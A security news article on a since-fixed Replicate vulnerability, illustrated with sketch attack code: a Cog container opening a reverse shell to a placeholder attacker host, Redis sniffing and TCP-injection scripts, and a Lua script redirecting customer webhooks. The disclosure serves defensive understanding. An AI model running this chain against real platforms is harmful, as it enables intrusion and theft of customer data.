Critical Vulnerability In AI-As-A-Service Provider Let Attackers Access Sensitive Data


A critical vulnerability was found in the Replicate AI platform that could have exposed the private AI models and application data of all its customers.

The vulnerability stemmed from challenges in tenant separation, a recurring issue in AI-as-a-service platforms. 

By exploiting it, attackers could have gained unauthorized access to users’ prompts and the corresponding AI results. The flaw was responsibly disclosed to Replicate and promptly addressed, and no customer data is known to have been compromised.

Replicate, a platform for sharing and running AI models, lets users upload containerized models in its Cog format, which packages a model together with a RESTful API server. Because customers can upload arbitrary containers, a malicious Cog image can carry code of the attacker’s choosing.

Remote Code Execution on Replicate’s infrastructure using a malicious Cog container.

Researchers created a malicious Cog container and uploaded it to Replicate, achieving remote code execution on Replicate’s infrastructure.
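
To illustrate the attack surface, here is a minimal sketch of what such a malicious Cog predictor might look like, assuming the standard Cog interface (`cog.BasePredictor`); the reverse-shell payload and the `attacker.example.com` hostname are hypothetical placeholders, and the published research does not include the researchers’ actual container.

```python
# predict.py -- hypothetical malicious Cog predictor (a sketch, not the
# researchers' actual code).
import subprocess

from cog import BasePredictor, Input


class Predictor(BasePredictor):
    def setup(self) -> None:
        # Cog invokes setup() when the container starts serving requests,
        # so anything placed here runs on the provider's infrastructure --
        # for example, a reverse shell to an attacker-controlled host
        # (placeholder address and port).
        subprocess.Popen(
            ["bash", "-c", "bash -i >& /dev/tcp/attacker.example.com/4444 0>&1"]
        )

    def predict(self, prompt: str = Input(description="Model input")) -> str:
        # Return a plausible response so the model appears benign.
        return f"echo: {prompt}"
```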

This highlights a broader risk in AI-as-a-service platforms: untrusted, customer-supplied models can themselves serve as an attack vector.


Similar techniques were previously used to exploit Hugging Face’s managed AI inference service. 

Finding a pre-established TCP connection via `netstat`.

The researchers gained root privileges within their container on Replicate’s Kubernetes cluster and found that it shared its network namespace with another container holding an established connection to a Redis server.

Pre-established TCP connection with Redis server in Replicate’s network.
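
The same reconnaissance can be sketched in a few lines of Python, using psutil as a `netstat` analogue; Redis’ default port 6379 is an assumption for illustration.

```python
# Sketch: list established TCP connections visible in the shared network
# namespace, looking for a neighbouring container's Redis session
# (default port 6379 assumed).
import psutil

for conn in psutil.net_connections(kind="tcp"):
    if (
        conn.status == psutil.CONN_ESTABLISHED
        and conn.raddr
        and conn.raddr.port == 6379
    ):
        print(f"{conn.laddr.ip}:{conn.laddr.port} -> "
              f"{conn.raddr.ip}:{conn.raddr.port}")
```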

Using the container’s CAP_NET_RAW and CAP_NET_ADMIN capabilities, the researchers ran tcpdump to identify the Redis connection, confirmed the traffic was plaintext, and set out to manipulate the shared Redis queue to potentially affect other Replicate customers.
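
A minimal sniffing sketch with scapy, which, like tcpdump, relies on CAP_NET_RAW (the Redis port is again an assumption), shows how readable the session is; the sequence and acknowledgment numbers it prints are exactly the state the later injection step needs.

```python
# Sketch: sniff the neighbour's plaintext Redis traffic. RESP commands are
# readable in the raw TCP payload, and the seq/ack values are the state an
# attacker must match to inject into the connection.
from scapy.all import TCP, Raw, sniff


def show_redis(pkt):
    if pkt.haslayer(Raw):
        print(pkt[TCP].seq, pkt[TCP].ack, pkt[Raw].load[:80])


sniff(filter="tcp port 6379", prn=show_redis, count=20)
```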

According to the Wiz Research Team, the researchers lacked credentials to connect to the Redis server directly, so they devised a plan to inject packets into the existing, already-authenticated connection.

By injecting TCP packets carrying Redis commands into that connection, they bypassed authentication and gained unauthorized access to customer data on the shared Redis server.
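
A minimal injection sketch with scapy follows; every address, port, and sequence number below is a placeholder, since in the real attack these values had to be copied from the sniffed live connection so the server accepts the forged segment as coming from the already-authenticated client.

```python
# Sketch: forge a TCP segment that rides the authenticated Redis session.
# All values are placeholders -- src/dst, ports, seq and ack must match
# the live connection observed via sniffing.
from scapy.all import IP, TCP, Raw, send

# A Redis command in the RESP wire protocol (LPUSH used as an example).
resp = b"*3\r\n$5\r\nLPUSH\r\n$5\r\nqueue\r\n$4\r\ndata\r\n"

pkt = (
    IP(src="10.0.0.5", dst="10.0.0.9")          # spoofed client -> Redis
    / TCP(sport=51234, dport=6379, flags="PA",  # state copied from sniffing
          seq=1000, ack=2000)
    / Raw(load=resp)
)
send(pkt, verbose=False)
```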

While modifying existing entries in the Redis stream proved difficult due to its append-only nature, the researchers were still able to manipulate the data flow.

They injected a Lua script that located a specific customer request, removed it from the queue, rewrote its webhook field to point at a malicious server under their control, and reinserted the modified request into the queue. This allowed them to intercept, and potentially alter, the prediction results sent back to the customer.

Lua script injected into Redis’ TCP stream.
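
A minimal sketch of that queue-manipulation logic as a Redis Lua script follows; the stream key, the exact field layout, and delivery via an injected EVAL command are assumptions for illustration, as the published research does not reproduce the exact script.

```python
# Sketch: Lua script (as it might be delivered via an injected EVAL) that
# rewrites the webhook of queued prediction requests. The stream key and
# field layout are hypothetical.
LUA_SWAP_WEBHOOK = """
local entries = redis.call('XRANGE', KEYS[1], '-', '+')
for _, entry in ipairs(entries) do
  local id, fields = entry[1], entry[2]
  for i = 1, #fields, 2 do
    if fields[i] == 'webhook' then
      -- Streams are append-only, so delete the entry and re-add it with
      -- the webhook rewritten to point at the attacker's server.
      redis.call('XDEL', KEYS[1], id)
      fields[i + 1] = ARGV[1]
      redis.call('XADD', KEYS[1], '*', unpack(fields))
    end
  end
end
"""

# Delivered over the hijacked connection as, for example:
#   EVAL <script> 1 predictions https://attacker.example.com/hook
```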

In practice, the vulnerability could have allowed attackers to steal proprietary knowledge or sensitive data from customers’ models through malicious queries.

Moreover, attackers could manipulate prompts and responses, compromising the models’ decision-making processes.

This vulnerability threatened the integrity of AI outputs and could have had severe downstream impacts on users who rely on those models. 
